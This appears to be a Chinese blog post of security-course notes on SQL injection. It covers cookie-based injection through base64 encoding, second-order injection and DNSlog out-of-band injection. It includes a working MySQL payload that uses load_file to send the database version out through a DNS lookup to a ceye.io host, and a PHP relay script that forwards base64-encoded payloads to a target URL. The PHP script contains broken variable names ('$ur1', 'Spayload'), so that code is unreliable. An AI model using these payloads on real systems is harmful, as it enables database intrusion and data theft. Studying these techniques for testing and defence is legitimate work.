<小迪安全>17-SQL注入之二次,加解密,DNS注入

最新推荐文章于 2024-08-13 16:56:55 发布
最新推荐文章于 2024-08-13 16:56:55 发布
阅读量93 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackerXxxt/article/details/129545994
版权

cookie&加解密

        源代码中加密了一次,所以要先将cookie的值解密,加上注入语句后加密,再来测试注入点

二次注入

一般在源代码中发现漏洞,例如注册界面

 

 #将后面语句注释,使得修改的账户变成dhakkan。

面对输出的长度限制,若是在前端,可以直接在源代码中修改,后端则无办法。

 

 DNSlog

        要有文件读取的权限才能进行

DNSlog解决了盲注不能回显,效率低的问题

mysql> select * from users where id=1 and if((select load_file(concat('\\\\', (select version()),'.eii0i8.ceye.io\\abc'))),1,0);Empty set (21.14 sec)

 中转注入

<?php
$url='http://xxx/job_bystjb/yjs_byszjs.asp?id=';
$payload=base64_encode($_GET['x']);
echo $payload;
$urls=$ur1.Spayload;
file_get_contents($urls);
echo $urls;
?>

 

资源

http:/ceye.io/

https://github.com/ADOOO/DnslogSqlinj

hackerXxxt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
B站小迪安全笔记第十七天-SQL注入二次加解密dns注入
m0_61530426的博客
07-29 778
B站小迪安全笔记
小迪安全17web漏洞,SQL注入二次加解密DNS注入
qq_46116117的博客
12-27 374
17 web漏洞,SQL注入二次加解密DNS注入 加解密注入 知识点 即get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器 如果想要对这个网站,再ID处进行注入 则需要先编写sql注入语句,然后在进行base64编码 案例:sql-libs–21 正常页面 一看就是cookie注入 抓个包看看 YWRtaW4%3D %3D为url编码的= 尝试用base64解码看看 我们可以尝试在这里进行注入注入的sql语句经过base64加密之后放入cooki
小迪安全】Day17web漏洞-SQL注入二次加解密DNS注入
qq_44312640的博客
11-03 289
介绍了SQL注入中的二次加解密dnslog注入方法。
17天:WEB漏洞-SQL注入二次,加解密,DNS注入1
08-03
在网络安全领域,Web漏洞是常见的安全威胁之一,SQL注入是一种尤为危险的攻击方式。本文将深入探讨二次注入加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL...
大学生《计算机网络》期末复习题3套(含答案).pdf
02-03
- **SQL注入**:利用应用程序漏洞,向数据库发送恶意SQL语句。 #### 8. 加密技术 - **对称加密**:加密和解密使用相同的密钥。 - DES - AES - **非对称加密**:加密和解密使用不同的密钥。 - RSA - ECC #### 9...
TCPIP高效编程:改善网络程序的44个技巧(高清带书签)
08-08
- **安全防护**:采取多种措施保护网站免受攻击,如DDoS防护、SQL注入防护等。 - **认证与授权**:实现安全的用户认证和授权机制。 #### 知识点三十六:跨域资源共享(CORS) - **CORS机制**:跨域资源共享允许...
asp.net知识库
06-18
最详细的SQL注入相关的命令整理 Oracle Oracle中PL/SQL单行函数和组函数详解 mssql+oracle Oracle编程的编码规范及命名规则 Oracle数据库字典介绍 0RACLE的字段类型 事务 CMT DEMO(容器管理事务演示) 事务隔离性的...
java开源包1
06-28
BoneCP很小,只有四十几K(运行时需要slf4j和guava的支持,这二者加起来就不小了),而相比之下 C3P0 要六百多K。 异步输出框架 AsynWriter 一个Java的类库,用于异步输出记录的简单小框架用于高并发下数据输出使用...
Linux安全与高级应用(十三)深入解析Linux中的rsync远程同步:原理、配置与应用
洛秋的博客
08-13 528
1.1 rsync的基本原理rsync(Remote Sync)是一种用于本地或远程的文件同步工具。与传统的文件拷贝工具不同,rsync的核心优势在于其增量同步的特性,即只传输源和目标之间不同的文件部分,极大地减少了数据传输量。rsync支持通过SSH或直接使用rsync协议进行数据同步,这使得它在跨网络的大数据备份中表现尤为出色。1.2 rsync的优势增量备份:只同步差异文件或文件的变化部分,大幅减少网络传输量和时间。安全性:通过SSH加密通道进行传输,保障数据的安全。灵活性。
在亚马逊云科技上安全、合规、私密地调用生成式AI大模型
m0_66628975的博客
08-13 1290
Amazon Bedrock 是亚马逊云科技提供的一项服务,旨在帮助开发者轻松构建和扩展生成式 AI 应用。Bedrock 提供了访问多种强大的基础模型(Foundation Models)的能力,支持多种不同大模型厂商的模型,如AI21 Labs, Anthropic, Cohere, Meta, Mistral AI, Stability AI, 和Amazon,用户可以使用这些模型来创建、定制和部署各种生成式 AI 应用程序,而无需从头开始训练模型。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 247
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
SSL发送邮件:如何确保邮件传输过程安全
DengHua2203的博客
08-13 253
配置SSL发送邮件需要正确设置邮件客户端和邮件服务器,并定期检查SSL证书的有效性。AokSend,通过API与SMTP接口,安全SSL加密发送邮件,保护数据,营销无忧!
什么是网络安全态势感知
m0_66268916的博客
08-13 109
德迅云安全 态势感知采用先进大数据架构,通过采集系统的网络安全数据信息,对所有安全数据进行统一处理分析,实现对网络攻击行为、安全威胁事件、日志、流量等网络安全问题的发现和告警,打造安全可监控、威胁可感知、事件可控制的安全能力。态势感知是一种基于环境的、动态、整体地洞悉安全风险的能力,是以安全大数据为基础,从全局视角提升对安全威胁的发现识别、理解分析、响应处置能力的一种方式、最终是为了决策与行动,是安全能力的落地。通过列表、搜索、详情等方式对告警进行展示,支持告警溯源和攻击链分析,让每一次攻击都无处可藏。
安全无忧!Windows7全补丁旗舰版:集成所有补丁!
lihuiyun184291的博客
08-13 87
今日,系统之家小编给大家分享集成所有补丁的Windows7旗舰版系统,集成至2023.12所有官方补丁,修复了系统高危漏洞,让大家时刻都能舒心地展开操作。系统基于微软 Windows 7 2009 SP1 旗舰版进行离线制作,全新升级的优化方案,系统性能更好,运作更加流畅,且系统安装步骤简单易懂,支持硬盘安装。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 85
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
大型、复杂、逼真的安全服和安全帽检测:数据集和方法
最新发布
I‘m Frank Lee
08-13 391
智能升级工地安全:SFCHD数据集与SCALE模块介绍
CC攻击解决方案,如何处理CC攻击
dexunyun的博客
08-09 806
CC攻击作为网络世界中的一大威胁,对网站的安全与稳定构成了严峻挑战。然而,通过部署安全加速SCDN,我们可以有效应对CC攻击,确保网站的安全与稳定。作为网络管理员和网站拥有者,我们应时刻保持警惕,不断提升自身的安全防护能力,为用户提供更加安全、可靠的网络服务。
springboot发送邮箱功能的安全与加密配置?
danplus的博客
08-13 194
SpringBoot发送邮箱功能的安全与加密配置对于保护邮件传输中的敏感信息至关重要。AokSend,Spring Boot邮件发送优选!API+SMTP接口,简化配置,高效稳定,让邮件营销如虎添翼!
<dependency> <groupId>com.baomidou</groupId> <artifactId>mybatis-plus-boot-starter</artifactId> <version>3.4.2</version> </dependency> 提示CVE-2022-25517 9.8 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability pending CVSS allocation 应该如何解决
06-02
这个提示是指 MyBatis Plus 存在 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来获取敏感信息或者对系统造成危害。要解决这个问题,需要升级 MyBatis Plus 的版本到 3.4.3 或者更高版本,这个漏洞在这个版本中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值